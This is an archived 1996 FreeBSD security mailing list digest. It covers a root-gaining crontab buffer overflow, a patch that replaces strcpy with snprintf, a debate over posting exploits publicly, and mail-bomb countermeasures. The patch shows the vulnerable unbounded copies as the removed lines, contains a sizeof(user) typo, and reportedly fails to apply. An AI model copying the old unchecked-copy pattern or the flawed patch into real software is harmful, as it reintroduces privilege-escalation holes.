Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk >1) It is based on a secured OS phillosophy >2) It is "commercially" backed by the vendor >3) It has been tested >4) Availability of the source to the modified kernel is impossible compared >to FreeBSD as FreeBSD is a very "open" software distribution with source >codes freely available. "Security through Obscurity" is a very false sense of security. It also leaves you at the mercy of the vendor. Sometimes, "commercial" support is worse than no support. There are a number of individuals/companies who will be happy to provide support-for-hire for FreeBSD. With FreeBSD you have the added advantage that you have support options. You can do it yourself with lots of help on the net. You can also hire someone for support. And if you are not pleased with them, you can select another. From owner-freebsd-security Mon Dec 16 05:27:59 1996 Return-Path: Received: (from root@localhost) by freefall.freebsd.org (8.8.4/8.8.4) id FAA29059 for security-outgoing; Mon, 16 Dec 1996 05:27:59 -0800 (PST) Received: from eel.dataplex.net (eel.dataplex.net [208.2.87.2]) by freefall.freebsd.org (8.8.4/8.8.4) with ESMTP id FAA29053 for ; Mon, 16 Dec 1996 05:27:57 -0800 (PST) Received: from [208.2.87.4] (cod [208.2.87.4]) by eel.dataplex.net (8.7.5/8.7.3) with ESMTP id HAA23931; Mon, 16 Dec 1996 07:28:02 -0600 (CST) X-Sender: rkw@mail.dataplex.net Message-Id: In-Reply-To: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Mon, 16 Dec 1996 07:27:15 -0600 To: Dmitry Valdov From: Richard Wackerbarth Subject: Re: crontab security hole exploit Cc: security@FreeBSD.ORG Sender: owner-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk >Hello! > >Exploit for buffer overflow in crontab. > > >/* ---------------------------- CUT HERE >----------------------------------- */ Please do not post exploit details to the list. The details can be sent privately to security-officer@FreeBSD.ORG. Observations that they exist, preferably with impact statements (eg. user can gain root access) and proposed fixes are appropriate for public notice. From owner-freebsd-security Mon Dec 16 05:55:15 1996 Return-Path: Received: (from root@localhost) by freefall.freebsd.org (8.8.4/8.8.4) id FAA02605 for security-outgoing; Mon, 16 Dec 1996 05:55:15 -0800 (PST) Received: from scanner.worldgate.com (scanner.worldgate.com [198.161.84.3]) by freefall.freebsd.org (8.8.4/8.8.4) with ESMTP id FAA02589; Mon, 16 Dec 1996 05:55:11 -0800 (PST) Received: from znep.com (uucp@localhost) by scanner.worldgate.com (8.7.5/8.7.3) with UUCP id GAA06048; Mon, 16 Dec 1996 06:53:44 -0700 (MST) Received: from localhost (marcs@localhost) by alive.ampr.ab.ca (8.7.5/8.7.3) with SMTP id GAA07865; Mon, 16 Dec 1996 06:51:33 -0700 (MST) Date: Mon, 16 Dec 1996 06:51:33 -0700 (MST) From: Marc Slemko X-Sender: marcs@alive.ampr.ab.ca To: Dmitry Valdov cc: freebsd-bugs@freebsd.org, freebsd-security@freebsd.org Subject: Re: crontab security hole In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk On Mon, 16 Dec 1996, Dmitry Valdov wrote: > Hello! > > Are there any fixes for crontab? I've exploit which allow any user to become > root using crontab security hole. > > Dmitry. > It was fixed in -stable the other day by pst. The patch, pulled from the CVS tree, follows. Index: cron/database.c =================================================================== RCS file: /usr/cvs/src/usr.sbin/cron/cron/database.c,v retrieving revision 1.1.1.1 retrieving revision 1.1.1.1.6.1 diff -c -r1.1.1.1 -r1.1.1.1.6.1 *** database.c 1994/08/27 13:43:03 1.1.1.1 --- database.c 1996/12/15 20:37:47 1.1.1.1.6.1 *************** *** 112,119 **** if (dp->d_name[0] == '.') continue; ! (void) strcpy(fname, dp->d_name); ! sprintf(tabname, CRON_TAB(fname)); process_crontab(fname, fname, tabname, &statbuf, &new_db, old_db); --- 112,119 ---- if (dp->d_name[0] == '.') continue; ! (void)snprintf(fname, sizeof fname, "%s", dp->d_name); ! (void)snprintf(tabname, sizeof tabname, CRON_TAB(fname)); process_crontab(fname, fname, tabname, &statbuf, &new_db, old_db); Index: crontab/crontab.c =================================================================== RCS file: /usr/cvs/src/usr.sbin/cron/crontab/crontab.c,v retrieving revision 1.3.4.1 retrieving revision 1.3.4.2 diff -c -r1.3.4.1 -r1.3.4.2 *** crontab.c 1996/04/09 21:23:11 1.3.4.1 --- crontab.c 1996/12/15 20:37:59 1.3.4.2 *************** *** 17,23 **** *************** *** 167,173 **** ProgramName, optarg); exit(ERROR_EXIT); } ! (void) strcpy(User, optarg); break; case 'l': if (Option != opt_unknown) --- 167,173 ---- ProgramName, optarg); exit(ERROR_EXIT); } ! (void) snprintf(User, sizeof(user), "%s", optarg); break; case 'l': if (Option != opt_unknown) *************** *** 198,204 **** } else { if (argv[optind] != NULL) { Option = opt_replace; ! (void) strcpy (Filename, argv[optind]); } else { usage("file name must be specified for replace"); } --- 198,205 ---- } else { if (argv[optind] != NULL) { Option = opt_replace; ! (void) snprintf(Filename, sizeof(Filename), "%s", ! argv[optind]); } else { usage("file name must be specified for replace"); } *************** *** 480,486 **** ProgramName, Filename); goto done; default: ! fprintf(stderr, "%s: panic: bad switch() in replace_cmd()\n"); goto fatal; } remove: --- 481,488 ---- ProgramName, Filename); goto done; default: ! fprintf(stderr, "%s: panic: bad switch() in replace_cmd()\n", ! ProgramName); goto fatal; } remove: From owner-freebsd-security Mon Dec 16 06:56:41 1996 Return-Path: Received: (from root@localhost) by freefall.freebsd.org (8.8.4/8.8.4) id GAA10501 for security-outgoing; Mon, 16 Dec 1996 06:56:41 -0800 (PST) Received: from xinit.se (root@vampire.xinit.se [194.14.168.3]) by freefall.freebsd.org (8.8.4/8.8.4) with ESMTP id GAA10496 for ; Mon, 16 Dec 1996 06:56:38 -0800 (PST) Received: from lich (lich.xinit.se [194.14.168.2]) by xinit.se (8.7.3/8.7.4) with SMTP id PAA13094; Mon, 16 Dec 1996 15:55:54 +0100 (MET) Date: Mon, 16 Dec 1996 15:55:59 +0100 (MET) From: Joakim Rastberg X-Sender: jor@lich To: Richard Wackerbarth cc: Dmitry Valdov , security@FreeBSD.ORG Subject: Re: crontab security hole exploit In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk On Mon, 16 Dec 1996, Richard Wackerbarth wrote: >>Exploit for buffer overflow in crontab. >Please do not post exploit details to the list. The details can be sent >privately to security-officer@FreeBSD.ORG. >Observations that they exist, preferably with impact statements (eg. user >can gain root access) and proposed fixes are appropriate for public notice. Is that official? Or only wishful thinking (ie if noone post them they will go away?). I would rather like the exploits be posted as they can be used to leverage the "management" to pay attention (background: I am working as a contractor to run some unix-boxes and although I whine about the low security *nothing* happens until I can show I get a #, then someone perhaps pulls the plug and pays for a more secure installation. My point beeing is that many companies, at least the ones I work for, IGNORES holes until someone have shown them the exploit) /joakim rastberg, Xinit AB, Sundsvall Sweden. From owner-freebsd-security Mon Dec 16 06:58:10 1996 Return-Path: Received: (from root@localhost) by freefall.freebsd.org (8.8.4/8.8.4) id GAA10557 for security-outgoing; Mon, 16 Dec 1996 06:58:10 -0800 (PST) Received: from threadway.teeny.org (root@threadway.teeny.org [204.245.200.1]) by freefall.freebsd.org (8.8.4/8.8.4) with ESMTP id GAA10552; Mon, 16 Dec 1996 06:58:07 -0800 (PST) Received: from localhost (downsj@localhost.teeny.org [127.0.0.1]) by threadway.teeny.org (8.8.4/8.6.12) with ESMTP id GAA18590; Mon, 16 Dec 1996 06:57:13 -0800 (PST) Message-Id: <199612161457.GAA18590@threadway.teeny.org> X-Mailer: exmh version 1.6.5 12/11/95 To: Marc Slemko cc: Dmitry Valdov , freebsd-bugs@freebsd.org, freebsd-security@freebsd.org Subject: Re: crontab security hole In-reply-to: Your message of "Mon, 16 Dec 1996 06:51:33 MST." Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Mon, 16 Dec 1996 06:57:12 -0800 From: Jason Downs Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk In message , Marc Slemko writes: >On Mon, 16 Dec 1996, Dmitry Valdov wrote: > >> Hello! >> >> Are there any fixes for crontab? I've exploit which allow any user to become >> root using crontab security hole. >> >> Dmitry. >> > >It was fixed in -stable the other day by pst. The patch, pulled >from the CVS tree, follows. Haven't any of you ever heard of a very simple and efficient non-stdio routine called, of all things, strncpy()? It's been around for, like, ever. >Index: cron/database.c >=================================================================== >RCS file: /usr/cvs/src/usr.sbin/cron/cron/database.c,v >retrieving revision 1.1.1.1 >retrieving revision 1.1.1.1.6.1 >diff -c -r1.1.1.1 -r1.1.1.1.6.1 >*** database.c 1994/08/27 13:43:03 1.1.1.1 >--- database.c 1996/12/15 20:37:47 1.1.1.1.6.1 >*************** >*** 112,119 **** > if (dp->d_name[0] == '.') > continue; > >! (void) strcpy(fname, dp->d_name); >! sprintf(tabname, CRON_TAB(fname)); > > process_crontab(fname, fname, tabname, > &statbuf, &new_db, old_db); >--- 112,119 ---- > if (dp->d_name[0] == '.') > continue; > >! (void)snprintf(fname, sizeof fname, "%s", dp->d_name); >! (void)snprintf(tabname, sizeof tabname, CRON_TAB(fname)); > > process_crontab(fname, fname, tabname, > &statbuf, &new_db, old_db); >Index: crontab/crontab.c >=================================================================== >RCS file: /usr/cvs/src/usr.sbin/cron/crontab/crontab.c,v >retrieving revision 1.3.4.1 >retrieving revision 1.3.4.2 >diff -c -r1.3.4.1 -r1.3.4.2 >*** crontab.c 1996/04/09 21:23:11 1.3.4.1 >--- crontab.c 1996/12/15 20:37:59 1.3.4.2 >*************** >*** 17,23 **** >*************** >*** 167,173 **** > ProgramName, optarg); > exit(ERROR_EXIT); > } >! (void) strcpy(User, optarg); > break; > case 'l': > if (Option != opt_unknown) >--- 167,173 ---- > ProgramName, optarg); > exit(ERROR_EXIT); > } >! (void) snprintf(User, sizeof(user), "%s", optarg); > break; > case 'l': > if (Option != opt_unknown) >*************** >*** 198,204 **** > } else { > if (argv[optind] != NULL) { > Option = opt_replace; >! (void) strcpy (Filename, argv[optind]); > } else { > usage("file name must be specified for replace"); > } >--- 198,205 ---- > } else { > if (argv[optind] != NULL) { > Option = opt_replace; >! (void) snprintf(Filename, sizeof(Filename), "%s", >! argv[optind]); > } else { > usage("file name must be specified for replace"); > } >*************** >*** 480,486 **** > ProgramName, Filename); > goto done; > default: >! fprintf(stderr, "%s: panic: bad switch() in replace_cmd()\n"); > goto fatal; > } > remove: >--- 481,488 ---- > ProgramName, Filename); > goto done; > default: >! fprintf(stderr, "%s: panic: bad switch() in replace_cmd()\n", >! ProgramName); > goto fatal; > } > remove: > > -- Jason Downs (503) 256-8535 -/- (503) 952-3749 downsj@teeny.org --> teeny.org: Free Software for a Free Internet <-- http://www.teeny.org/ This ain't no steeenking NetBSD. http://www.openbsd.org/ From owner-freebsd-security Mon Dec 16 07:18:36 1996 Return-Path: Received: (from root@localhost) by freefall.freebsd.org (8.8.4/8.8.4) id HAA11558 for security-outgoing; Mon, 16 Dec 1996 07:18:36 -0800 (PST) Received: from eel.dataplex.net (eel.dataplex.net [208.2.87.2]) by freefall.freebsd.org (8.8.4/8.8.4) with ESMTP id HAA11553 for ; Mon, 16 Dec 1996 07:18:34 -0800 (PST) Received: from [208.2.87.4] (cod [208.2.87.4]) by eel.dataplex.net (8.7.5/8.7.3) with ESMTP id JAA15179; Mon, 16 Dec 1996 09:18:49 -0600 (CST) X-Sender: rkw@mail.dataplex.net Message-Id: In-Reply-To: References: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Mon, 16 Dec 1996 09:14:25 -0600 To: Joakim Rastberg From: Richard Wackerbarth Subject: Re: crontab security hole exploit Cc: security@FreeBSD.ORG Sender: owner-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk jor@xinit.se writes: >I would rather like the exploits be posted as they can be used >to leverage the "management" to pay attention (background: I am working as >a contractor to run some unix-boxes and although I whine about the low >security *nothing* happens until I can show I get a #, then someone >perhaps pulls the plug and pays for a more secure installation. My point >beeing is that many companies, at least the ones I work for, IGNORES holes >until someone have shown them the exploit) An interesting perspective. My attitude is that it is better to have obscurity than having the exploit readily available to a wide audience. I realize that the truly good crackers can figure it out for themself. But there are many "children" who will try something when it is handed to them. IMHO, we should at least give the upper hand to the sysops and, if possible, provide the fix before the attack becomes widespread. From owner-freebsd-security Mon Dec 16 07:30:33 1996 Return-Path: Received: (from root@localhost) by freefall.freebsd.org (8.8.4/8.8.4) id HAA12226 for security-outgoing; Mon, 16 Dec 1996 07:30:33 -0800 (PST) Received: from pir.net (moek.pir.net [158.43.129.42]) by freefall.freebsd.org (8.8.4/8.8.4) with ESMTP id HAA12217; Mon, 16 Dec 1996 07:30:20 -0800 (PST) Received: (from pir@localhost) by pir.net (8.8.4/6.6.6) id PAA15934; Mon, 16 Dec 1996 15:34:21 GMT Date: Mon, 16 Dec 1996 15:34:21 GMT From: Peter Radcliffe Message-Id: <199612161534.PAA15934@pir.net> To: marcs@znep.com Subject: Re: crontab security hole Cc: freebsd-bugs@freebsd.org, freebsd-security@freebsd.org Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk > It was fixed in -stable the other day by pst. The patch, pulled > from the CVS tree, follows. yes, but trying to apply that patch to this 2.1.5 box gives me: -------------------------- Patching file crontab/crontab.c using Plan A... patch: **** unexpected end of hunk at line 38 -------------------------- Peter. From owner-freebsd-security Mon Dec 16 07:45:44 1996 Return-Path: Received: (from root@localhost) by freefall.freebsd.org (8.8.4/8.8.4) id HAA13238 for security-outgoing; Mon, 16 Dec 1996 07:45:44 -0800 (PST) Received: from ns.cs.hku.hk (ns.cs.hku.hk [147.8.178.10]) by freefall.freebsd.org (8.8.4/8.8.4) with SMTP id HAA13230 for ; Mon, 16 Dec 1996 07:45:40 -0800 (PST) Received: from champion (champion.cs.hku.hk) by ns.cs.hku.hk with SMTP id AA18005 (5.67b/IDA-1.5 for ) Mon, 16 Dec 1996 23:45:08 +0800 Received: by champion (4.1/S2.0-sunos4) id AA09908; Mon, 16 Dec 96 23:44:54 HKT Date: Mon, 16 Dec 1996 23:44:54 +0800 (HKT) From: Doug Kwan ~{9XUq5B~} To: mika ruohotie Cc: security@freebsd.org Subject: Re: mail bomb! In-Reply-To: <199612161201.OAA11649@shadows.aeon.net> Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk Hi, On Mon, 16 Dec 1996, mika ruohotie wrote: > you are using sendmail, right? > > you should atleast have this in your /etc/sendmail.cf > > O PrivacyOptions=authwarnings,needmailhelo,needexpnhelo,novrfy > > and then run it with loglevel 12, that should atleast help you from > tracking down from where he's connecting, assuming you have no clue. Our mail daemon always logs the IP address of the incoming mails but that bastard uses relaying hosts. So if the relaying hosts do not log the IP address of the mail source we cannot trace the origin. We have to contact the administrators of the relaying hosts for information. Some are will to help but not all. Typically, what we do not is to set our routers to stop all traffic between us and a relaying host. Now all the spam mails will be stuck in the relaying host. We will send a warning message to the adminstrator there via another channel telling him/her better cleanning the out-going mail queue before it is too late. > > but still, the administrative messages should _always_ be authenticated. > Will do. Thanks -Doug From owner-freebsd-security Mon Dec 16 08:03:41 1996 Return-Path: Received: (from root@localhost) by freefall.freebsd.org (8.8.4/8.8.4) id IAA14215 for security-outgoing; Mon, 16 Dec 1996 08:03:41 -0800 (PST) Received: from ecstasy.nanospace.com (qmailr@ecstasy.nanospace.com [205.199.196.92]) by freefall.freebsd.org (8.8.4/8.8.4) with SMTP id IAA14210 for ; Mon, 16 Dec 1996 08:03:36 -0800 (PST) Received: (qmail 965 invoked by uid 1000); 16 Dec 1996 16:04:28 -0000 Date: 16 Dec 1996 16:04:28 -0000 Message-ID: <19961216160428.964.qmail@ecstasy.nanospace.com> From: Oregon Ghost To: security@freebsd.org Subject: Re: crontab security hole exploit In-Reply-To: References: Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk -----BEGIN PGP SIGNED MESSAGE----- The exploits are posted to several other quite public lists (bugtraq has over 5000 subscribers now), so why not here? I should think it underscores the fact that the security hole is exploitable with publicly available code. Joakim Rastberg writes: > On Mon, 16 Dec 1996, Richard Wackerbarth wrote: > >>Exploit for buffer overflow in crontab. > >Please do not post exploit details to the list. The details can be sent > >privately to security-officer@FreeBSD.ORG. > >Observations that they exist, preferably with impact statements (eg. user > >can gain root access) and proposed fixes are appropriate for public notice. > > Is that official? Or only wishful thinking (ie if noone post them they > will go away?). I would rather like the exploits be posted as they can be used > to leverage the "management" to pay attention (background: I am working as > a contractor to run some unix-boxes and although I whine about the low > security *nothing* happens until I can show I get a #, then someone > perhaps pulls the plug and pays for a more secure installation. My point > beeing is that many companies, at least the ones I work for, IGNORES holes > until someone have shown them the exploit) > > /joakim rastberg, Xinit AB, Sundsvall Sweden. > > -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Processed by Mailcrypt 3.4, an Emacs/PGP interface iQEVAwUBMrVzBeyAA+ME1XYFAQF6Gwf+MYbu4xVo/1xm+LMmLoHjC/bIPbgYp7tW xVkZ+57o5+kDOA8itepbq/coG8RNN6Rh7trhSxKZGKPVX1lO090oF0/OKbn99UZZ SO+lR1id3gZS6V8dqEEmJnnK2ZwVHo4DKgX0GfddLaJ4+URpLM+GOzQUZf4LW8fT jg5NGpBNy7Q5vyeNPDDxWGJhwxaeHFf3MIaOwIMpO2TeZG8XX4dA4mzf1A9ydbQL ZoumOsc4tjsNC3XHN3NKP4wYdsXtipv0qwUWXBS9Ao1mJ++d4dQZBKOZxsQ6+qAb 0mUssMzgmI7B3C3z4xeHYjE/w0E0XBk8edhpvhKihTjp2o6/AUf3gg== =EvGH -----END PGP SIGNATURE----- From owner-freebsd-security Mon Dec 16 08:54:45 1996 Return-Path: Received: (from root@localhost) by freefall.freebsd.org (8.8.4/8.8.4) id IAA16989 for security-outgoing; Mon, 16 Dec 1996 08:54:45 -0800 (PST) Received: from solozzo.tele.pw.edu.pl (solozzo.tele.pw.edu.pl [148.81.65.130]) by freefall.freebsd.org (8.8.4/8.8.4) with ESMTP id IAA16978 for ; Mon, 16 Dec 1996 08:54:40 -0800 (PST) Message-Id: <199612161654.IAA16978@freefall.freebsd.org> Received: by solozzo.tele.pw.edu.pl (1.40.112.4/16.2) id AA009865548; Mon, 16 Dec 1996 17:59:09 +0100 From: Adam Kubicki Subject: why is -stable not secure? To: freebsd-security@freebsd.org Date: Mon, 16 Dec 1996 17:59:06 MET X-Mailer: Elm [revision: 112.2] Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk hi, I'd like to ask why patches included in -current aren't in -stable version? There are few serious bugs (security too) fixed in -current but not in -stable. How long it takes to move patches to -stable source tree?? -adam From owner-freebsd-security Mon Dec 16 08:56:57 1996 Return-Path: Received: (from root@localhost) by freefall.freebsd.org (8.8.4/8.8.4) id IAA17142 for security-outgoing; Mon, 16 Dec 1996 08:56:57 -0800 (PST) Received: from seabass.progroup.com (catfish.progroup.com [206.24.122.2]) by freefall.freebsd.org (8.8.4/8.8.4) with ESMTP id IAA17131 for ; Mon, 16 Dec 1996 08:56:52 -0800 (PST) Received: (from craig@localhost) by seabass.progroup.com (8.7.5/8.6.12) id IAA19864 for security@FreeBSD.ORG; Mon, 16 Dec 1996 08:54:26 -0800 (PST) Message-Id: <199612161654.IAA19864@seabass.progroup.com> Subject: Re: crontab security hole exploit To: security@FreeBSD.ORG Date: Mon, 16 Dec 1996 08:54:26 -0800 (PST) From: "Craig Shaver" In-Reply-To: from "Joakim Rastberg" at Dec 16, 96 03:55:59 pm X-Mailer: ELM [version 2.4 PL25 ME8b] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk > > On Mon, 16 Dec 1996, Richard Wackerbarth wrote: > >>Exploit for buffer overflow in crontab. > >Please do not post exploit details to the list. The details can be sent > >privately to security-officer@FreeBSD.ORG. > >Observations that they exist, preferably with impact statements (eg. user > >can gain root access) and proposed fixes are appropriate for public notice. > > Is that official? Or only wishful thinking (ie if noone post them they > will go away?). I would rather like the exploits be posted as they can be used > to leverage the "management" to pay attention (background: I am working as > a contractor to run some unix-boxes and although I whine about the low > security *nothing* happens until I can show I get a #, then someone > perhaps pulls the plug and pays for a more secure installation. My point > beeing is that many companies, at least the ones I work for, IGNORES holes > until someone have shown them the exploit) > > /joakim rastberg, Xinit AB, Sundsvall Sweden. > > > It certainly helps me understand what is really going on. I can learn from this to code defensively. Is there someplace or some book that someone who is writing new software can refer to for learning how to write secure code in the first place? I certainly don't want to ask some whiny security cop for each and every little detail.... :) -- Craig Shaver (craig@progroup.com) (415)390-0654 Productivity Group POB 60458 Sunnyvale, CA 94088 From owner-freebsd-security Mon Dec 16 09:32:28 1996 Return-Path: Received: (from root@localhost) by freefall.freebsd.org (8.8.4/8.8.4) id JAA19231 for security-outgoing; Mon, 16 Dec 1996 09:32:28 -0800 (PST) Received: from Zero-Cool.Hades.Org (root@dialup-1-4.net.ic.ac.uk [155.198.8.4]) by freefall.freebsd.org (8.8.4/8.8.4) with ESMTP id JAA19218 for ; Mon, 16 Dec 1996 09:32:17 -0800 (PST) Received: (from scot@localhost) by Zero-Cool.Hades.Org (8.7.5/8.7.3) id RAA01921; Mon, 16 Dec 1996 17:32:05 GMT Date: Mon, 16 Dec 1996 17:32:05 +0000 (GMT) From: Scot Elliott Reply-To: pumpkin@uk.pi.net To: FreeBSD Security list Subject: Re: crontab security hole exploit In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk On Mon, 16 Dec 1996, Richard Wackerbarth wrote: > >Hello! > > > >Exploit for buffer overflow in crontab. > > > > > >/* ---------------------------- CUT HERE > >----------------------------------- */ > > Please do not post exploit details to the list. The details can be sent > privately to security-officer@FreeBSD.ORG. > Observations that they exist, preferably with impact statements (eg. user > can gain root access) and proposed fixes are appropriate for public notice. > Yeah... well although it's not really appropriate to publically explain how at crack a system, I personally find it more educational than just a patch... at least then it's easy to see how the hack was working, where as the output from diff isn't all that easy to follow. Scot. --------------------------------------------------------------------------- | Scot Elliott | Please note that any opinions | | MEng Computing IV. | expressed are mine, and not those | | Imperial College, London | of the department or college. | --------------------------------------------------------------------------- | e-mail: s.elliott@ic.ac.uk | IRC nick: PlumbrBoy | | pumpkin@uk.pi.net | "You are everything in my fridge" | --------------------------------------------------------------------------- From owner-freebsd-security Mon Dec 16 10:07:27 1996 Return-Path: Received: (from root@localhost) by freefall.freebsd.org (8.8.4/8.8.4) id KAA21767 for security-outgoing; Mon, 16 Dec 1996 10:07:27 -0800 (PST) Received: from procert.cert.dfn.de (root@procert.cert.dfn.de [134.100.14.1]) by freefall.freebsd.org (8.8.4/8.8.4) with ESMTP id KAA21745 for ; Mon, 16 Dec 1996 10:07:06 -0800 (PST) Received: from tiger.cert.dfn.de (ley@tiger.cert.dfn.de [134.100.14.11]) by procert.cert.dfn.de (8.8.4/8.8.4) with ESMTP id TAA12088; Mon, 16 Dec 1996 19:10:14 +0100 (MET) From: Wolfgang Ley Received: (from ley@localhost) by tiger.cert.dfn.de (8.8.4/8.8.4) id TAA03636; Mon, 16 Dec 1996 19:10:12 +0100 (MET) Message-Id: <199612161810.TAA03636@tiger.cert.dfn.de> Subject: Re: crontab security hole exploit To: craig@ProGroup.COM (Craig Shaver) Date: Mon, 16 Dec 1996 19:10:11 +0100 (MET) Cc: security@freebsd.org In-Reply-To: <199612161654.IAA19864@seabass.progroup.com> from "Craig Shaver" at Dec 16, 96 08:54:26 am Organization: DFN-CERT (Computer Emergency Response Team, Germany) Content-Type: text Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk -----BEGIN PGP SIGNED MESSAGE----- Craig Shaver wrote: > [...] > It certainly helps me understand what is really going on. I can learn from > this to code defensively. > > Is there someplace or some book that someone who is writing new software can > refer to for learning how to write secure code in the first place? I > certainly don't want to ask some whiny security cop for each and every > little detail.... :) You might want to check the the "Secure Programming Checklist" which is a collection of the suggestions from the "Practical UNIX and Internet Security" book and a paper from AUSCERT. ftp://ftp.auscert.org.au/pub/auscert/papers/secure_programming_checklist ...or any mirror Bye, Wolfgang. - -- Wolfgang Ley, DFN-CERT, Vogt-Koelln-Str. 30, 22527 Hamburg, Germany Email: ley@cert.dfn.de Phone: +49 40 5494-2262 Fax: +49 40 5494-2241 PGP-Key available via finger ley@ftp.cert.dfn.de any key-server or via WWW from http://www.cert.dfn.de/~ley/ ...have a nice day -----BEGIN PGP SIGNATURE----- Version: 2.6.2i iQCVAwUBMrWQgQQmfXmOCknRAQGjJgQAt8SIblFH7EpMtMK2S1hlfA6dQJEhgRPO 5AgrjlA9O5sCYToMjAVwSngxoXnArhheK6q30aS8OoF5fW6YWy+DpZnnfRsbiTMC 5WjlshVnccfVs9QHPALziUWf2zTkNk1hNtZgmkT7a5BfCmzA8HiOrYR9w/FYEcgJ uYRlsTcAzH0= =w0YU -----END PGP SIGNATURE----- From owner-freebsd-security Mon Dec 16 10:18:24 1996 Return-Path: Received: (from root@localhost) by freefall.freebsd.org (8.8.4/8.8.4) id KAA22313 for security-outgoing; Mon, 16 Dec 1996 10:18:24 -0800 (PST) Received: from gateway.skipstone.com (root@GATEWAY.SKIPSTONE.COM [198.214.10.129]) by freefall.freebsd.org (8.8.4/8.8.4) with ESMTP id KAA22307 for ; Mon, 16 Dec 1996 10:18:21 -0800 (PST) Received: from bugs.skipstone.com (bugs.skipstone.com [204.69.236.2]) by gateway.skipstone.com (8.7.4/8.6.9) with ESMTP id MAA02564; Mon, 16 Dec 1996 12:18:15 -0600 Received: from [204.69.236.50] (hotapplepie.skipstone.com [204.69.236.50]) by bugs.skipstone.com (8.7.5/8.7.3) with ESMTP id MAA31273; Mon, 16 Dec 1996 12:18:06 -0600 X-Sender: rkw@mail.dataplex.net Message-Id: In-Reply-To: <199612161654.IAA19864@seabass.progroup.com> References: from "Joakim Rastberg" at Dec 16, 96 03:55:59 pm Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Mon, 16 Dec 1996 12:18:05 -0600 To: "Craig Shaver" From: Richard Wackerbarth Subject: Re: crontab security hole exploit Cc: security@FreeBSD.org Sender: owner-security@FreeBSD.org X-Loop: FreeBSD.org Precedence: bulk >Is there someplace or some book that someone who is writing new software can >refer to for learning how to write secure code in the first place? I >certainly don't want to ask some whiny security cop for each and every >little detail.... :) Most of the exploits currently being discovered are a direct result of programs which move user input into a fixed buffer without checking the length of the string. In each case, someone figures out what will get clobbered and creates a "string" that is designed to overwrite whatever follows the buffer. When those buffers are on the stack, it is very easy to clobber the return stack with a piece of code that takes control. The solution is to use "safe" string copy routines that honor the length of the receiving buffer. Since the methodology of a particular instance does not add to the sphere of knowledge, the details of the exploit don't really give most of us any useful information. From owner-freebsd-security Mon Dec 16 10:24:37 1996 Return-Path: Received: (from root@localhost) by freefall.freebsd.org (8.8.4/8.8.4) id KAA22777 for security-outgoing; Mon, 16 Dec 1996 10:24:37 -0800 (PST) Received: from passer.osg.gov.bc.ca (0@passer.osg.gov.bc.ca [142.32.110.29]) by freefall.freebsd.org (8.8.4/8.8.4) with ESMTP id KAA22751; Mon, 16 Dec 1996 10:24:25 -0800 (PST) Received: from localhost (15005@localhost [127.0.0.1]) by passer.osg.gov.bc.ca (8.8.4/8.6.10) with SMTP id KAA19084; Mon, 16 Dec 1996 10:19:58 -0800 (PST) From: Cy Schubert - ITSD Open Systems Group Message-Id: <199612161819.KAA19084@passer.osg.gov.bc.ca> X-Authentication-Warning: passer.osg.gov.bc.ca: 15005@localhost [127.0.0.1] didn't use HELO protocol Reply-to: cschuber@uumail.gov.bc.ca X-Mailer: MH X-Sender: cschuber To: Terry Lambert cc: rb@gid.co.uk (Bob Bishop), proff@iq.org, security@FreeBSD.ORG, hackers@FreeBSD.ORG Subject: Re: vulnerability in new pw suite In-reply-to: Your message of "Sun, 15 Dec 96 13:39:04 MST." <199612152039.NAA23837@phaeton.artisoft.com> Date: Mon, 16 Dec 96 10:19:57 -0800 X-Mts: smtp Sender: owner-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk DEC UNIX, with C2 security enabled, allows the user to decide whether to use a system generated password or a user picked password. One could take this concept one step further than DEC has done and have it controlled by a configuration file with either global or per-user defaults. passer$ passwd Old password: Last successful password change for cschuber: Mon Dec 2 07:06:07 1996 Last unsuccessful password change for cschuber: Fri Mar 1 08:03:27 1996 Do you want (choose one letter only): Pronounceable passwords generated for you (g) A string of characters generated for you (c) A string of letters generated for you (l) ? To pick your password (p) ? Enter choice here (q to quit): q Password not changed: user aborted program. passer$ Just my $0.02 worth. Regards, Phone: (250)387-8437 Cy Schubert OV/VM: BCSC02(CSCHUBER) Open Systems Support BITNET: CSCHUBER@BCSC02.BITNET ITSD Internet: cschuber@uumail.gov.bc.ca cschuber@bcsc02.gov.bc.ca "Quit spooling around, JES do it." From owner-freebsd-security Mon Dec 16 10:33:05 1996 Return-Path: Received: (from root@localhost) by freefall.freebsd.org (8.8.4/8.8.4) id KAA23187 for security-outgoing; Mon, 16 Dec 1996 10:33:05 -0800 (PST) Received: from gvr.win.tue.nl (root@gvr.win.tue.nl [131.155.210.19]) by freefall.freebsd.org (8.8.4/8.8.4) with ESMTP id KAA23181 for ; Mon, 16 Dec 1996 10:33:01 -0800 (PST) Received: (from guido@localhost) by gvr.win.tue.nl (8.8.4/8.8.2) id TAA25027; Mon, 16 Dec 1996 19:32:07 +0100 (MET) From: Guido van Rooij Message-Id: 